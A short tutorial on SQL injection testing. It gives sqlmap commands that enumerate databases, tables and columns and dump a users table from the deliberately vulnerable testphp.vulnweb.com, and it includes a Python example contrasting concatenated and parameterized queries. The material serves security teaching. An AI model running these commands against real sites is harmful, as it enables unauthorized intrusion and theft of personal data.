SQL Injection Testing Using SQLMAP

Try out SQLMAP on this vulnerable website: testphp.vulnweb.com

Test for a simple SQL injection by appending a single quote (') to the end of the URL.
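Why the single-quote test exposes the flaw, and what the fix looks like on the server side, as an added example that is not from the original post. The table, its rows and the function names are constructed for illustration, and an in-memory SQLite database stands in for the site's real backend.

```python
import sqlite3

def make_db():
    # Constructed stand-in table; not the real site's schema or data.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE artists (artist_id INTEGER, name TEXT)")
    db.executemany("INSERT INTO artists VALUES (?, ?)",
                   [(1, "artist-one"), (2, "artist-two")])
    return db

def lookup_concat(db, artist):
    # Vulnerable pattern: the URL parameter becomes part of the SQL text,
    # so a stray quote changes how the statement is parsed.
    sql = "SELECT name FROM artists WHERE artist_id = " + artist
    return [row[0] for row in db.execute(sql)]

def lookup_bound(db, artist):
    # Hardened pattern: the SQL text is fixed and the parameter is bound
    # as a value, so it is never parsed as SQL.
    sql = "SELECT name FROM artists WHERE artist_id = ?"
    return [row[0] for row in db.execute(sql, (artist,))]

def outcome(fn, db, artist):
    # What a tester observes: result rows, or a database syntax error.
    try:
        return ("rows", fn(db, artist))
    except sqlite3.OperationalError as exc:
        return ("sql-error", str(exc))

if __name__ == "__main__":
    db = make_db()
    for value in ("1", "1'"):
        print(repr(value), "concat:", outcome(lookup_concat, db, value))
        print(repr(value), "bound: ", outcome(lookup_bound, db, value))
```

A database error in response to the quote is the signal that the parameter reaches the SQL parser; with a bound parameter the same input simply matches no row.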

Let’s try with SQLMAP

Finding databases

sqlmap -u "http://testphp.vulnweb.com/artists.php?artist=1" --dbs

--dbs lists all the available databases.

2 databases available

Finding tables inside the database

sqlmap -u "http://testphp.vulnweb.com/artists.php?artist=1" -D acuart --tables

Finding columns in the database

sqlmap -u "http://testphp.vulnweb.com/artists.php?artist=1" -D acuart -T users --columns

Dump the data

sqlmap -u "http://testphp.vulnweb.com/artists.php?artist=1" -D acuart -T users -C phone --dump

This retrieves the phone numbers.

Use the same command with the various columns to retrieve data.
